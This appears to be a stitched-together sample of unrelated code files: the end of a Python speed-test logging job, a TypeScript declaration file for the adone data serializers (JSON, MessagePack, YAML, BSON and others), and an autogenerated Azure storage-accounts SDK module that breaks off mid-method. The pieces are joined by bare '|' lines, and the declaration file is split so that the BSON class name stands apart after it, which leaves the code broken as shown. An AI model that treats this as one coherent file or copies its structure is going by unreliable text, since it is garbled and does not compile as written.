db_result.status = 'complete'
db_result.download = download
db_result.upload = upload
db_result.ping = ping
db_result.country = country
db_result.town = town
db_result.sponsor = sponsor
db.commit()
logging.info("Periodic connection test job completed.")
except Exception as err:
logging.error("Error occured during periodic connection test job: %s" % str(err))
db_result.status = 'error'
db.commit()
finally:
db.close()
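
# Illustrative sketch, not part of the original module: one simple way to drive
# the "periodic" job above, with a fixed sleep between runs. The interval is a
# placeholder assumption; a real deployment might use cron or a scheduler.
def run_forever(interval_seconds=3600):
    import time
    while True:
        run_speedtest()
        time.sleep(interval_seconds)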
|
|
data.d.ts
|
declare namespace adone {
/**
* Various data [de]serializers
*/
namespace data {
/**
* JSON encoder
*/
namespace json {
namespace I {
type Replacer = ((key: string, value: any) => any) | string[];
interface CompareValue {
key: string;
value: any;
}
type CompareFunction = (a: CompareValue, b: CompareValue) => number;
}
/**
* Actually, the same as JSON.stringify, but returns a buffer
*/
function encode(obj: any, options?: {
/**
* A String or Number object that's used to insert white space into the output JSON string for readability purposes
*/
space?: string,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: I.Replacer
}): Buffer;
/**
* Decodes JSON string or buffer
*/
function decode(buf: string | Buffer): any;
/**
* Deterministic version of JSON.stringify() so you can get a consistent hash from stringified results
*/
function encodeStable(obj: any, options?: {
/**
* Indent spaces for pretty-printing
*/
space?: string,
/**
* Whether to allow circular JSON structure
*/
cycles?: boolean,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: I.Replacer,
/**
* Custom comparison function for object keys
*/
cmp?: I.CompareFunction
}): string;
function encodeSafe(obj: any): string;
function decodeSafe(str: string): any;
}
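/*
 * Illustrative usage sketch (kept in a comment, since this is a declaration
 * file; it assumes a runtime `adone` object matching these declarations):
 *
 *     const stable = adone.data.json.encodeStable({ b: 1, a: 2 });
 *     // keys come out in a deterministic order, e.g. '{"a":2,"b":1}',
 *     // so hashing the result is stable across runs
 */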
/**
* MessagePack encoder
*/
namespace mpak {
/**
* Encodes the given object
*/
function encode(obj: any): Buffer;
/**
* Decoder the given buffer
*/
function decode(buf: collection.I.ByteArray.Wrappable): any;
namespace I {
type Type = string | number; // ?
type DecodeFunction = (buf: collection.ByteArray) => any;
type EncodeFunction = (x: any) => collection.ByteArray;
type EncodeCheckFunction = (x: any) => boolean;
interface DecodingType {
/**
* Value type
*/
type: Type;
/**
* Decode function
*/
decode: DecodeFunction;
}
interface EncodingType {
/**
* Value type
*/
type: Type;
/**
* Encode function
*/
encode: EncodeFunction;
/**
* Check function
*/
check: EncodeCheckFunction;
}
}
/**
* Represents a MessagePack encoder
*/
class Encoder {
constructor(encodingTypes: I.EncodingType[]);
/**
* Encodes the given value
*/
encode<T extends collection.ByteArray = collection.ByteArray>(x: any, buf?: T): T;
}
/**
* Represents a MessagePack decoder
*/
class Decoder {
constructor(decodingTypes: I.DecodingType[]);
/**
* Decodes the given buffer
*/
decode(buf: collection.I.ByteArray.Wrappable): any;
/**
* Decodes the given ByteArray buffer, but does not throw IncompleteBufferError if the size is invalid
*/
tryDecode(buf: collection.ByteArray): any;
}
/**
* Represents a MessagePack serializer
*/
class Serializer {
/**
* Encoder instance
*/
readonly encoder: Encoder;
/**
* Decoder instance
*/
readonly decoder: Decoder;
/**
* Registers an encoder for the given type
*
* @param type type identifier
* @param check type predicate
* @param encode type encoder
*/
registerEncoder(type: I.Type, check: I.EncodeCheckFunction, encode: I.EncodeFunction): this;
/**
* Registers a decoder for the given type
*
* @param type type identifier
* @param decode type decoder
*/
registerDecoder(type: I.Type, decode: I.DecodeFunction): this;
/**
* Registers encoder/decoder functions for the given type and constructor
*
* @param type type identifier
* @param constructor type constructor, used in the predicate function (instanceof)
* @param encode type encoder
* @param decode type decoder
*/
register<T>(
type: I.Type,
constructor: { new (...args: any[]): T },
encode: (x: T, buf: collection.ByteArray) => void,
decode: (buf: collection.ByteArray) => T
): this;
/**
* Encodes the given value
*/
encode<T extends collection.ByteArray = collection.ByteArray>(x: any, buf?: T): T;
/**
* Decodes the given buffer
*/
decode(buf: collection.I.ByteArray.Wrappable, needFlip?: boolean): any;
}
/**
* An instance of default adone serializer with registered encoders/decoders for standard js/adone types like
* x.Exception, Error, Date, Map, Set, math.Long
*/
const serializer: Serializer;
}
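/*
 * Illustrative usage sketch (kept in a comment, since this is a declaration
 * file; it assumes a runtime `adone` object matching these declarations):
 *
 *     const buf = adone.data.mpak.encode({ id: 7, tags: ["a", "b"] });
 *     const obj = adone.data.mpak.decode(buf); // deep-equal round trip
 *
 * Custom classes would go through serializer.register(type, Ctor, encode,
 * decode), as declared above.
 */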
/**
* JSON5 encoder
*/
namespace json5 {
/**
* Encodes the given value
*/
function encode(obj: any, options?: {
/**
* Indent spaces for pretty-printing
*/
space?: string,
/**
* A function that alters the behavior of the stringification process,
* or an array of String and Number objects that serve as a whitelist
* for selecting/filtering the properties of the value object to be included in the JSON string
*/
replacer?: ((key: string, value: any) => any) | string[]
}): Buffer;
/**
* Decodes the given string/buffer
*/
function decode(buf: string | Buffer, reviver?: (holder: object, key: string, value: any) => any): any;
}
/**
* Base64 encoder
*/
namespace base64 {
/**
* Encodes a string/Buffer to base64
*/
function encode(str: string | Buffer, options: { buffer: false }): string;
function encode(str: string | Buffer, options?: { buffer?: true }): Buffer;
/**
* Decodes base64 string/buffer into a buffer
*/
function decode(str: string | Buffer, options: { buffer: true }): Buffer;
/**
* Decodes base64 string/buffer into a string
*/
function decode(str: string | Buffer, options?: { buffer?: false }): string;
function encodeVLQ(value: number): string;
function decodeVLQ(value: string, index: number | undefined, rest: true): { value: number, index: number };
function decodeVLQ(value: string, index?: number, rest?: boolean): number;
/**
* Maps a character to a base64 number
*/
function decodeCharCode(c: string): number;
/**
* Maps a number to a base64 character
*/
function decodeNumber(n: number): string;
}
/**
* YAML encoder
*/
namespace yaml {
/**
* YAML loaders
*/
namespace loader {
namespace I {
interface Options {
/**
* String to be used as a file path in error/warning messages. Default: null
*/
filename?: string;
/**
* Specifies a schema to use
*/
schema?: schema.Schema;
/**
* Function to call on warning messages.
* Loader will throw on warnings if this function is not provided
*/
onWarning?(warning: any): void;
/**
* Compatibility with JSON.parse behaviour.
* If true, then duplicate keys in a mapping will override values rather than throwing an error
*/
json?: boolean;
}
}
/**
* Same as safeLoadAll() but uses DEFAULT_FULL by default
*/
function loadAll(input: string | Buffer, iterator: (doc: any) => void, options?: I.Options): void;
function loadAll(input: string | Buffer, iterator?: undefined, options?: I.Options): any[];
/**
 * Same as safeLoad() but uses DEFAULT_FULL by default - adds some JavaScript-specific types: !!js/function, !!js/regexp and !!js/undefined.
* For untrusted sources, you must additionally validate object structure to avoid injections
*/
function load(input: string | Buffer, options?: I.Options): any;
/**
 * Same as safeLoad(), but understands multi-document sources.
 * Applies iterator to each document if specified, or returns an array of documents.
 * This method is safe for untrusted data
*/
function safeLoadAll(input: string | Buffer, iterator: (doc: any) => void, options?: I.Options): void;
function safeLoadAll(input: string | Buffer, iterator?: undefined, options?: I.Options): any[];
/**
 * Parses string as a single YAML document. Returns a JavaScript object or throws YAMLException on error.
 * By default, does not support regexps, functions and undefined.
 * This method is safe for untrusted data
*/
function safeLoad(input: string | Buffer, options?: I.Options): any;
}
/**
* YAML dumpers
*/
namespace dumper {
namespace I {
interface Options {
/**
* indentation width to use (in spaces). Default: 2
*/
indent?: number;
/**
* Do not throw on invalid types (like function in the safe schema) and skip pairs and single values with such types.
* Default: false
*/
skipInvalid?: boolean;
/**
* Specifies level of nesting, when to switch from block to flow style for collections.
                 * -1 means block style everywhere. Default: -1
*/
flowLevel?: number;
/**
* "tag" => "style" map. Each tag may have own set of styles
*/
styles?: object;
/**
* Specifies a schema to use
*/
schema?: schema.Schema;
/**
* If true, sort keys when dumping YAML. If a function, use the function to sort the keys. Default: false
*/
sortKeys?: boolean;
/**
* Set max line width. Default: 80
*/
lineWidth?: number;
/**
* If true, don't convert duplicate objects into references. Default: false
*/
noRefs?: boolean;
/**
* If true don't try to be compatible with older yaml versions.
* Currently: don't quote "yes", "no" and so on, as required for YAML 1.1.
* Default: false
*/
noCompatMode?: boolean;
/**
                 * If true, flow sequences will be condensed, omitting the space between items, e.g. '[a,b]'
*/
condenseFlow?: boolean;
}
}
/**
* Same as safeDump() but without limits (uses DEFAULT_FULL by default)
*/
function dump(input: any, options?: I.Options): string;
/**
* Serializes object as a YAML document.
* Uses DEFAULT_SAFE, so it will throw an exception if you try to dump regexps or functions
*/
function safeDump(input: any, options?: I.Options): string;
}
/**
* YAML types for custom schemas
*/
namespace type {
namespace I {
type Kind = "scalar" | "sequence" | "mapping";
interface TypeOptions<T> {
kind: Kind;
resolve?(data: string): boolean;
construct?(data: string): T;
instanceOf?: object;
predicate?(obj: any): boolean;
represent?: ((obj: any, style: string) => string) | { [key: string]: (obj: any, style: string) => string };
defaultStyle?: string;
styleAliases?: object;
}
}
class Type<T = any> {
tag: string;
resolve(data: string): boolean;
construct(data: string): T;
instanceOf?: object;
predicate?(obj: any): boolean;
            represent?: ((obj: any, style: string) => string) | { [key: string]: (obj: any, style: string) => string };
defaultStyle?: string;
styleAliases?: object;
constructor(tag: string, options: I.TypeOptions<T>);
}
namespace I {
interface Scalar<T = any> extends Type<T> {
kind: "scalar";
}
interface Mapping extends Type<object> {
kind: "mapping";
}
interface Sequence<T = any> extends Type<T[]> {
kind: "sequence";
}
}
const Binary: I.Scalar<Buffer>;
const Bool: I.Scalar<boolean>;
const Float: I.Scalar<number>;
const Int: I.Scalar<number>;
const Map: I.Mapping;
const Merge: I.Scalar;
const Null: I.Scalar<null>;
const Omap: I.Sequence<object>;
const Pairs: I.Sequence<[string, any]>;
const Seq: I.Sequence;
const Set: I.Mapping;
const Str: I.Scalar<string>;
const Timestamp: I.Scalar<Date>;
namespace js {
const Function: I.Scalar<(...args: any[]) => void>;
const RegExp: I.Scalar<RegExp>;
const Undefined: I.Scalar<undefined>;
}
}
/**
* YAML schemas
*/
namespace schema {
class Schema {
include: Schema[];
implicit: type.Type[];
explicit: type.Type[];
compiledImplicit: type.Type[];
compiledExplicit: type.Type[];
compiledTypeMap: {
scalar: { [key: string]: type.Type },
sequence: { [key: string]: type.Type },
mapping: { [key: string]: type.Type },
fallback: { [key: string]: type.Type }
};
constructor(_?: { include?: Schema[], implicit?: type.Type[], explicit?: type.Type[] });
}
function create(schemas: Schema | Schema[], types: type.Type | type.Type[]): Schema;
/**
* same as JSON
*/
const CORE: Schema;
/**
* all supported YAML types
*/
const DEFAULT_FULL: Schema;
/**
* all supported YAML types, without unsafe ones: !!js/undefined, !!js/regexp and !!js/function
*/
const DEFAULT_SAFE: Schema;
/**
* only strings, arrays and plain objects
*/
const FAILSAFE: Schema;
/**
* all JSON-supported types
*/
const JSON: Schema;
}
/**
     * Represents a mark that is used in exceptions to define the error's location
*/
class Mark {
name: string;
buffer: string;
position: number;
line: number;
column: number;
constructor(name: string, buffer: string, position: number, line: number, column: number);
getSnippet(indent?: number, maxLength?: number): string;
toString(compact?: boolean): string;
}
/**
* Represents a YAML exception
*/
class Exception extends adone.x.Exception {
reason: string;
mark: Mark;
constructor(reason: string, mark: Mark);
}
/**
* Encodes the given object using DEFAULT_SAFE scheme by default
*/
function encode(obj: any, options?: dumper.I.Options): Buffer;
/**
* Decodes the given string/buffer using DEFAULT_SAFE scheme by default
*/
function decode(buf: string | Buffer, options?: loader.I.Options): any;
/**
     * The same as safeLoad() but uses DEFAULT_FULL by default - adds some JavaScript-specific types: !!js/function, !!js/regexp and !!js/undefined.
* For untrusted sources, you must additionally validate object structure to avoid injections
*/
const load: typeof loader.load;
/**
* Same as safeLoadAll() but uses DEFAULT_FULL by default
*/
const loadAll: typeof loader.loadAll;
/**
* Parses string as single YAML document. Returns a JavaScript object or throws YAMLException on error.
* By default, does not support regexps, functions and undefined.
* This method is safe for untrusted data
*/
const safeLoad: typeof loader.safeLoad;
/**
* Same as safeLoad(), but understands multi-document sources.
* Applies iterator to each document if specified, or returns array of documents
*/
const safeLoadAll: typeof loader.safeLoadAll;
/**
* Same as safeDump() but without limits (uses DEFAULT_FULL by default)
*/
const dump: typeof dumper.dump;
/**
* Serializes object as a YAML document.
* Uses DEFAULT_SAFE, so it will throw an exception if you try to dump regexps or functions
*/
const safeDump: typeof dumper.safeDump;
}
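    // YAML round-trip sketch (adone.data.yaml assumed as the entry point; uses the
    // safe variants, which reject functions/regexps as documented above):
    //
    //   const doc = adone.data.yaml.safeLoad("a: 1\nb: [x, y]");
    //   const text = adone.data.yaml.safeDump(doc, { indent: 2, sortKeys: true });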
/**
* BSON encoder
*/
namespace bson {
namespace I {
interface Type {
_bsontype: string;
}
}
/**
* Represents a BSON Binary type
*/
class Binary implements I.Type {
_bsontype: "binary";
constructor(buffer: number | Buffer, subType?: number);
/**
* Updates this binary with `byte`
*/
put(byte: number): void;
/**
* Writes a buffer or string to the binary
*/
write(string: string | Buffer, offset?: number): void;
/**
* Reads length bytes starting at position
*/
read(position: number, length?: number): void;
/**
* Returns the value of this binary as a string or buffer
*/
value(asRaw: true): Buffer;
value(): string;
/**
* Returns the length of the binary
*/
length(): number;
toJSON(): string;
toString(): string;
static BUFFER_SIZE: number;
static SUBTYPE_DEFAULT: number;
static SUBTYPE_FUNCTION: number;
static SUBTYPE_BYTE_ARRAY: number;
static SUBTYPE_UUID_OLD: number;
static SUBTYPE_UUID: number;
static SUBTYPE_MD5: number;
static SUBTYPE_USER_DEFINED: number;
}
/**
* Represents BSON Code type
*/
class Code implements I.Type {
_bsontype: "Code";
/**
* @param code a string or function
* @param scope an optional scope for the function
*/
constructor(code: string | ((...args: any[]) => void), scope?: object);
toJSON(): { scope: object, code: string };
}
/**
* Represents BSON DBRef type
*/
class DBRef implements I.Type {
_bsontype: "DBRef";
/**
* @param namespace the collection name
* @param oid the reference ObjectID
* @param db optional db name, if omitted the reference is local to the current db
*/
constructor(namespace: string, oid: ObjectId, db?: string);
toJSON(): { $ref: string, $id: ObjectId, $db: string };
}
/**
* Represents BSON Decimal128 type
*/
class Decimal128 implements I.Type {
_bsontype: "Decimal128";
/**
* @param bytes a buffer containing the raw Decimal128 bytes
*/
constructor(bytes: Buffer);
toString(): string;
toJSON(): { $numberDecimal: string };
/**
* Create a Decimal128 instance from a string representation
*
* @param string a numeric string representation
*/
static fromString(string: string): Decimal128;
}
/**
* Represents BSON Double type
*/
class Double implements I.Type {
_bsontype: "Double";
constructor(value: number);
valueOf(): number;
toJSON(): number;
}
        /**
         * Represents BSON Int32 type
         */
class Int32 implements I.Type {
_bsontype: "Int32";
constructor(value: number);
valueOf(): number;
toJSON(): number;
}
/**
* Represents BSON Long type
*/
class Long extends math.Long implements I.Type {
_bsontype: "Long";
static MIN_VALUE: Long;
static MAX_VALUE: Long;
static MAX_UNSIGNED_VALUE: Long;
static ZERO: Long;
static UZERO: Long;
static ONCE: Long;
static ONE: Long;
static UONE: Long;
static NEG_ONE: Long;
}
/**
* Represents BSON MaxKey type
*/
class MaxKey implements I.Type {
_bsontype: "MaxKey";
}
/**
* Represents BSON MinKey type
*/
class MinKey implements I.Type {
_bsontype: "MinKey";
}
/**
* Represents BSON ObjectId type
*/
class ObjectId implements I.Type {
_bsontype: "ObjectId";
generationTime: number;
constructor(id?: string | Buffer | ObjectId | { toHexString(): string, id: string | Buffer | ObjectId });
/**
* Return the ObjectId id as a 24 byte hex string representation
*/
toHexString(): string;
/**
* Returns the next ObjectId index
*/
getInc(): number;
/**
* Generate a 12 byte id buffer used in ObjectId's
*/
generate(time?: number): Buffer;
toString(format?: string): string;
toJSON(): string;
/**
* Compares the equality of this ObjectID with otherID
*/
equals(other: string | Buffer | ObjectId | { toHexString(): string }): boolean;
/**
* Returns the generation date (accurate up to the second) that this ID was generated
*/
getTimestamp(): Date;
/**
* Creates an ObjectId
*/
static createPk(): ObjectId;
/**
* Creates an ObjectId from a second based number, with the rest of the ObjectId zeroed out. Used for comparisons or sorting the ObjectId
*/
static createFromTime(time: number): ObjectId;
/**
* Creates an ObjectID from a hex string representation of an ObjectId
*/
static createFromHexString(string: string): ObjectId;
/**
* Checks if a value is a valid bson ObjectId
*/
static isValid(id: any): boolean;
static index: number;
}
/**
* Represents BSON RegExp type
*/
class BSONRegExp implements I.Type {
_bsontype: "BSONRegExp";
constructor(pattern: string, options?: string);
}
/**
* Represents BSON Symbol type
*/
class Symbol implements I.Type {
_bsontype: "Symbol";
constructor(value: string);
valueOf(): string;
toString(): string;
inspect(): string;
toJSON(): string;
}
/**
* This type is for INTERNAL use in MongoDB only and should not be used in applications
*/
class Timestamp extends math.Long implements I.Type {
_bsontype: "Timestamp";
static MIN_VALUE: Timestamp;
static MAX_VALUE: Timestamp;
static MAX_UNSIGNED_VALUE: Timestamp;
static ZERO: Timestamp;
static UZERO: Timestamp;
static ONCE: Timestamp;
static ONE: Timestamp;
static UONE: Timestamp;
static NEG_ONE: Timestamp;
}
namespace I {
interface SerializeOptions {
/**
* Whether to check if keys are valid. Default: false
*/
checkKeys?: boolean;
/**
* Whether to serialize javascript functions. Default: false
*/
serializeFunctions?: boolean;
/**
* Whether to ignore undefined values. Default: true
*/
ignoreUndefined?: boolean;
}
interface DeserializeOptions {
/**
* Evaluate functions in the BSON document scoped to the object deserialized.
* Default: false
*/
evalFunctions?: boolean;
/**
* Cache evaluated functions for reuse.
* Default: false
*/
cacheFunctions?: boolean;
/**
* Use a crc32 code for caching, otherwise use the string of the function.
* Default: false
*/
                cacheFunctionsCrc32?: boolean;
/**
* When deserializing a Long will fit it into a Number if it's smaller than 53 bits.
* Default: true
*/
promoteLongs?: boolean;
/**
* When deserializing a Binary will return it as a node.js Buffer instance.
* Default: false
*/
promoteBuffers?: boolean;
/**
* When deserializing will promote BSON values to their Node.js closest equivalent types.
* Default: false
*/
promoteValues?: boolean;
/**
                 * Allows specifying which fields should be returned as unserialized raw buffers.
*/
fieldsAsRaw?: string[];
/**
* Return BSON regular expressions as BSONRegExp instances.
* Default: false
*/
bsonRegExp?: boolean;
}
}
/**
* Represents a BSON serializer
*/
class
|
{
constructor(types?: Array<{ new (...args: any[]): I.Type }>);
/**
* Serializes a js object into a buffer
*/
serialize(object: object, options?: I.SerializeOptions): Buffer;
/**
* Takes an object, a target buffer instance and an optional options object and returns the end serialization index
* in the final buffer
*/
serializeWithBufferAndIndex(object: object, buffer: Buffer, options?: I.SerializeOptions & {
/**
* The index in the buffer where we wish to start serializing into
*/
index?: number
}): number;
/**
* Calculates the size BSON object for the given object
*/
calculateObjectSize(object: object, options?: {
/**
* Whether to serialize javascript functions. Default: false
*/
serializeFunctions?: boolean,
/**
* Whether to ignore undefined values. Default: true
*/
ignoreUndefined?: boolean
}): number;
/**
* Deserializes the given buffer into an object
*/
deserialize(buf: Buffer, options?: I.DeserializeOptions): any;
/**
* Takes a node.js Buffer, startIndex and allow more control over deserialization of a Buffer containing concatenated BSON documents
*/
deserializeStream(buf: Buffer, startIndex: number, numberOfDocuments: number, documents: any[], docStartIndex: number, options?: I.DeserializeOptions): number;
}
namespace c {
const BSON_INT32_MIN: number;
const BSON_INT32_MAX: number;
const BSON_INT64_MAX: number;
const BSON_INT64_MIN: number;
const JS_INT_MAX: number;
const JS_INT_MIN: number;
}
/**
* BSON serializator instance
*/
const serializer: BSON;
/**
* Encodes the given object
*/
function encode(obj: object, options?: I.SerializeOptions): Buffer;
/**
* Decodes the given buffer with enabled buffers and values promoting
*/
function decode(buf: Buffer, options?: I.DeserializeOptions): any;
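        // Round-trip sketch using the declarations above (entry point assumed):
        //
        //   const buf = adone.data.bson.encode({ _id: new adone.data.bson.ObjectId() });
        //   const doc = adone.data.bson.decode(buf); // buffers/values promoted, per decode()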
}
}
}
|
BSON
|
_storage_accounts_operations.py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class StorageAccountsOperations:
"""StorageAccountsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2017_10_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def check_name_availability(
self,
account_name: "_models.StorageAccountCheckNameAvailabilityParameters",
**kwargs: Any
) -> "_models.CheckNameAvailabilityResult":
"""Checks that the storage account name is valid and is not already in use.
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountCheckNameAvailabilityParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CheckNameAvailabilityResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.CheckNameAvailabilityResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CheckNameAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.check_name_availability.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(account_name, 'StorageAccountCheckNameAvailabilityParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CheckNameAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/checkNameAvailability'} # type: ignore
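    # Hedged usage sketch (the surrounding ``client`` object is an assumption):
    #
    #   params = _models.StorageAccountCheckNameAvailabilityParameters(name="mystorageacct")
    #   result = await client.storage_accounts.check_name_availability(params)
    #   if not result.name_available:
    #       print(result.reason, result.message)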
async def _create_initial(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> Optional["_models.StorageAccount"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.StorageAccount"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def begin_create(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountCreateParameters",
**kwargs: Any
) -> AsyncLROPoller["_models.StorageAccount"]:
"""Asynchronously creates a new storage account with the specified parameters. If an account is
already created and a subsequent create request is issued with different properties, the
account properties will be updated. If an account is already created and a subsequent create or
update request is issued with the exact same set of properties, the request will succeed.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide for the created account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either StorageAccount or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.storage.v2017_10_01.models.StorageAccount]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
account_name=account_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
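    # Hedged sketch of driving the returned poller (variable names are assumptions):
    #
    #   poller = await client.storage_accounts.begin_create(rg_name, account_name, create_params)
    #   account = await poller.result()  # blocks until the long-running operation completes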
async def delete(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> None:
"""Deletes a storage account in Microsoft Azure.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
